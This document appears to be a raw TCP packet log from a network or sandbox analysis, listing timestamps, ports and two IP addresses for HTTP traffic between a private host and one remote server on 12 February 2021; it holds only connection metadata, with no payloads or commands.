Feb 12, 2021 10:01:27.120347977 CET	49768	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:27.120371103 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:27.120409012 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:27.120685101 CET	49768	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:27.120806932 CET	49768	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:27.201770067 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:27.568183899 CET	49769	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:27.649032116 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:27.651441097 CET	49769	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:27.651565075 CET	49769	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:27.774559021 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.070991993 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.071022987 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.071039915 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.071055889 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.071074009 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.071089983 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.071105957 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.071120977 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.071122885 CET	49769	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:28.071141005 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.071160078 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.071187019 CET	49769	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:28.071345091 CET	49769	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:28.151842117 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.151869059 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.151885033 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.151901007 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.151913881 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.151931047 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.151947021 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.151949883 CET	49769	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:28.151959896 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.151978970 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.151990891 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.151993990 CET	49769	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:28.152004957 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.152024984 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.152031898 CET	49769	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:28.152044058 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.152053118 CET	49769	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:28.152060986 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.152071953 CET	49769	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:28.152079105 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.152095079 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.152111053 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.152121067 CET	49769	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:28.152127981 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.152143955 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.152156115 CET	49769	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:28.152163982 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.152173996 CET	49769	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:28.152384043 CET	49769	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:28.232815981 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.232846022 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.232863903 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.232880116 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.232897043 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.232914925 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.232929945 CET	49769	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:28.232933044 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.232954025 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.232973099 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.232985973 CET	49769	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:28.232989073 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.233004093 CET	49769	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:28.233007908 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.233023882 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.233040094 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.233052969 CET	49769	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:28.233056068 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.233061075 CET	49769	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:28.233073950 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.233093977 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.233113050 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.233129025 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.233129025 CET	49769	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:28.233136892 CET	49769	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:28.233148098 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.233165979 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.233181000 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.233197927 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.233213902 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.233233929 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.233243942 CET	49769	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:28.233251095 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.233268023 CET	49769	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:28.233268976 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.233285904 CET	49769	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:28.233287096 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.233297110 CET	49769	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:28.233305931 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.233315945 CET	49769	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:28.233321905 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.233346939 CET	49769	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:28.233347893 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.233366013 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.233411074 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.233437061 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.233453989 CET	49769	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:28.233454943 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.233473063 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.233493090 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.233510971 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.233522892 CET	49769	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:28.233529091 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.233532906 CET	49769	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:28.233546019 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.233562946 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.233587027 CET	49769	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:28.233752966 CET	49769	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:28.314363956 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.314424038 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.314462900 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.314502001 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.314538002 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.314549923 CET	49769	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:28.314577103 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.314584017 CET	49769	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:28.314618111 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.314698935 CET	49769	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:28.315829992 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.315881968 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.315917969 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.315957069 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.315995932 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.316018105 CET	49769	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:28.316036940 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.316072941 CET	49769	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:28.316086054 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.316129923 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.316164017 CET	49769	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:28.316169024 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.316217899 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.316257000 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.316293955 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.316293001 CET	49769	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:28.316333055 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.316349983 CET	49769	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:28.316375017 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.316401958 CET	49769	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:28.316412926 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.316453934 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.316490889 CET	49769	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:28.316492081 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.316541910 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.316585064 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.316606998 CET	49769	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:28.316623926 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.316663980 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.316667080 CET	49769	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:28.316701889 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.316728115 CET	49769	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:28.316740036 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.316780090 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.316817045 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.316827059 CET	49769	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:28.316864967 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.316909075 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.316910028 CET	49769	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:28.316946030 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.316984892 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.316984892 CET	49769	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:28.317029953 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.317063093 CET	49769	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:28.317066908 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.317107916 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.317146063 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.317147970 CET	49769	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:28.317193031 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.317209005 CET	49769	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:28.317238092 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.317275047 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.317305088 CET	49769	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:28.317312956 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.317346096 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.317408085 CET	49769	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:28.317413092 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.317471027 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.317511082 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.317526102 CET	49769	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:28.317549944 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.317585945 CET	49769	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:28.359488010 CET	49769	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:28.395371914 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.395400047 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.395416975 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.395437956 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.395456076 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.395473957 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.395524979 CET	49769	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:28.395571947 CET	49769	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:28.395880938 CET	49769	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:28.398287058 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.398312092 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.398334026 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.398358107 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.398382902 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.398406982 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.398432016 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.398459911 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.398480892 CET	49769	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:28.398485899 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.398510933 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.398535013 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.398559093 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.398581028 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.398600101 CET	49769	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:28.398603916 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.398627996 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.398655891 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.398670912 CET	49769	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:28.398682117 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.398705959 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.398729086 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.398751974 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.398770094 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.398787975 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.398807049 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.398823977 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.398842096 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.398852110 CET	49769	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:28.398864031 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.398864985 CET	49769	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:28.398883104 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.398907900 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.398930073 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.398957968 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.398986101 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.399003983 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.399023056 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.399040937 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.399058104 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.399075031 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.399080038 CET	49769	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:28.399091959 CET	49769	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:28.399096966 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.399122000 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.399149895 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.399174929 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.399180889 CET	49769	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:28.399262905 CET	49769	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:28.431257010 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.440437078 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.440574884 CET	49769	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:28.476368904 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.476422071 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.476459980 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.476509094 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.476551056 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.476552010 CET	49769	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:28.476592064 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.476632118 CET	49769	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:28.476850033 CET	49769	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:28.479756117 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.479815006 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.479855061 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.479892969 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.479923010 CET	49769	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:28.479933023 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.479971886 CET	49769	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:28.479974985 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.480022907 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.480061054 CET	49769	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:28.480067015 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.480106115 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.480144978 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.480168104 CET	49769	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:28.480185032 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.480218887 CET	49769	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:28.480222940 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.480262995 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.480299950 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.480319023 CET	49769	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:28.480346918 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.480386019 CET	49769	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:28.480391979 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.480431080 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.480456114 CET	49769	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:28.480468988 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.480508089 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.480544090 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.480582952 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.480629921 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.480657101 CET	49769	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:28.480659962 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.480700970 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.480737925 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.480767965 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.480797052 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.480834961 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.480871916 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.480909109 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.480917931 CET	49769	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:28.480947018 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.480986118 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.481033087 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.481064081 CET	49769	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:28.481076002 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.481115103 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.481159925 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.481189013 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.481197119 CET	49769	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:28.481220007 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.481250048 CET	49769	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:28.481257915 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.481292009 CET	49769	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:28.481297016 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.481415987 CET	49769	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:28.521334887 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.521363974 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.521527052 CET	49769	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:28.557315111 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.557418108 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.557457924 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.557544947 CET	49769	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:28.557559013 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.557595015 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.557626963 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.557663918 CET	49769	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:28.557734966 CET	49769	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:28.562031031 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.562146902 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.562177896 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.562207937 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.562230110 CET	49769	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:28.562237024 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.562274933 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.562306881 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.562335968 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.562355042 CET	49769	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:28.562364101 CET	49769	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:28.562366962 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.562414885 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.562438011 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.562459946 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.562482119 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.562504053 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.562531948 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.562560081 CET	80	49769	35.228.31.40	192.168.2.6
